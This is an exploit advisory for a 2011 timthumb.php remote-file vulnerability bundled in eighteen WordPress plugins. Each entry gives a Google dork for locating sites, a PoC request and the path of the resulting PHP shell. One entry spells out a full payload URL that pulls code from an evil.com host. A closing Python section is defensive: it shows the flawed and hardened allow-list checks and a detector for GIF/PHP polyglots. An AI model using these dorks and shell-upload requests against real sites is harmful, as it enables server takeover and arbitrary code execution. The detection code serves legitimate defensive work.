# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

--- Description ---

The following WordPress plugins bundle a vulnerable version of the timthumb.php library. The library's allowed-sites check only tested whether an allowed domain string appeared somewhere in the requested URL, so a hostname such as blogger.com.evil.com passes the check. By hosting a malicious GIF file with PHP code appended to the end on an attacker-controlled domain of that form and passing its URL to the script through the src GET parameter, an attacker can have timthumb fetch the file into its cache directory with a .php extension, which yields a shell and arbitrary code execution on the webserver.

Reference: http://www.exploit-db.com/exploits/17602/

# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/external_md5(src).php

# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php

# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php

# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php

# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php

# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL

The URL must first be base64 encoded.

The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php

# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php

# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php

# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php

# Plugin: Islidex WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php

# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php

# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php

# Plugin: A Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php

# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php

# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php

# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php

# Plugin: User Avatar WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php

Requires register_globals to be enabled (so that the allowedSites array can be supplied in the query string) and at least one user account to have an avatar directory.

The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php

# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7

--- PoC ---

http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php
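The following is an added example, not code from the advisory or from any of the plugins above. It models the three things the advisory relies on: the substring-style allowed-sites check that lets a hostname like blogger.com.evil.com through (shown beside a hardened hostname comparison), the cache file location md5(src).php with the per-plugin prefix and directory names the advisory lists, and a defender-side check that flags the GIF-with-PHP-appended files this technique leaves in a cache directory. The allow-list contents, the sample polyglot bytes and the function names are assumptions constructed for the example; the appended PHP is inert.

```python
"""Added example (not part of the advisory): why the timthumb allowed-sites check
is bypassable, where the fetched file lands, and how to spot the resulting
GIF/PHP polyglots in a plugin cache directory."""
import hashlib
import re
from urllib.parse import urlparse

# Constructed allow-list in the style of the one timthumb shipped with (assumption,
# not copied from any particular plugin's copy of the library).
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "wordpress.com", "img.youtube.com"]


def weak_site_check(src, allowed=ALLOWED_SITES):
    """Substring match over the whole URL, the shape of the vulnerable check.
    Any URL that merely contains an allowed domain string passes, so both
    http://blogger.com.evil.com/poc.php and http://evil.com/blogger.com/x get through."""
    src_l = src.lower()
    return any(site.lower() in src_l for site in allowed)


def strict_site_check(src, allowed=ALLOWED_SITES):
    """Hardened check: parse the URL, require http(s), and compare the hostname
    exactly or as a proper subdomain (host == site or host ends with '.' + site)."""
    parts = urlparse(src)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return any(host == s.lower() or host.endswith("." + s.lower()) for s in allowed)


def cache_path(plugin_dir, src, prefix="external_", cache_dir="cache"):
    """Path the remote file is written to: <plugin_dir>/<cache_dir>/<prefix><md5(src)>.php.
    The advisory lists prefix 'external_' or none and cache_dir 'cache' or 'temp'
    depending on the plugin; the md5 is taken over the src string exactly as submitted."""
    digest = hashlib.md5(src.encode()).hexdigest()
    return "%s/%s/%s%s.php" % (plugin_dir, cache_dir, prefix, digest)


GIF_MAGIC = (b"GIF87a", b"GIF89a")
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def is_gif_php_polyglot(data):
    """Defender-side triage for a cache directory: a file that starts with a GIF
    header but also carries a PHP open tag is the artifact this technique leaves."""
    return data.startswith(GIF_MAGIC) and PHP_OPEN_TAG.search(data) is not None


def sample_polyglot():
    """Constructed sample of the file shape the advisory describes: a GIF header
    with PHP appended. The PHP only echoes a marker; it is not a shell."""
    return b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"<?php echo 'timthumb-poc'; ?>"


if __name__ == "__main__":
    evil = "http://blogger.com.evil.com/poc.php"
    good = "http://blogger.com/some/image.gif"
    for url in (evil, good):
        print(url, "weak:", weak_site_check(url), "strict:", strict_site_check(url))
    print("cache file:", cache_path("/wp-content/plugins/a-gallery", evil))
    print("polyglot:", is_gif_php_polyglot(sample_polyglot()))
```

Note that the hardened check still only restricts which hosts may be fetched; the fix actually shipped in later timthumb releases also stopped writing fetched content under a .php name, and a cache directory that the web server will execute from is a problem independent of the allow-list. For a site already running one of the listed plugins, running `is_gif_php_polyglot` over every file in the plugin's cache or temp directory is a cheap way to find existing uploads.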